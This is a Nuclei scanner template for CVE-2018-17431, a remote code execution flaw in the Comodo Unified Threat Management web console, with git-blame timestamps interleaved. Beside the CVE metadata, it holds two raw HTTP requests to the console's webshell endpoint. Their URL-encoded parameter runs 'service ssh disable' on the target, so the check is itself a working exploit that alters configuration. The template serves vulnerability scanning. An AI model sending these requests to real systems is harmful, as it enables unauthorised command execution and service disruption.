2021-01-02 05:00:39 +00:00
id : CVE-2018-17431
2020-09-22 14:41:13 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Comodo Unified Threat Management Web Console - Remote Code Execution
2020-09-22 14:41:13 +00:00
author : dwisiswant0
severity : critical
2022-05-13 20:26:43 +00:00
description : Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.
2023-09-06 12:57:14 +00:00
remediation : |
Apply the latest security patches or updates provided by Comodo to fix this vulnerability.
2021-08-19 13:15:35 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.exploit-db.com/exploits/48825
- https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-17431
2022-05-17 09:18:12 +00:00
- https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
2023-07-15 16:29:17 +00:00
- https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view
2021-09-10 11:26:40 +00:00
classification :
2023-01-21 16:19:45 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-17431
cwe-id : CWE-287
2023-07-15 16:29:17 +00:00
epss-score : 0.10458
2023-08-31 11:46:18 +00:00
epss-percentile : 0.94254
2023-09-06 12:57:14 +00:00
cpe : cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-15 16:29:17 +00:00
vendor : comodo
product : unified_threat_management_firewall
tags : cve2018,comodo,rce,edb,cve
2020-09-22 14:41:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-22 14:41:13 +00:00
- raw :
- |
GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
Host : {{Hostname}}
Connection : close
- | # to triggering RCE
GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
Host : {{Hostname}}
Connection : close
matchers-condition : and
matchers :
- type : word
2023-07-15 16:29:17 +00:00
part : body
2020-09-22 14:41:13 +00:00
words :
- "Configuration has been altered"
2023-07-15 16:29:17 +00:00
2020-09-22 14:41:13 +00:00
- type : status
status :
2022-05-13 20:26:43 +00:00
- 200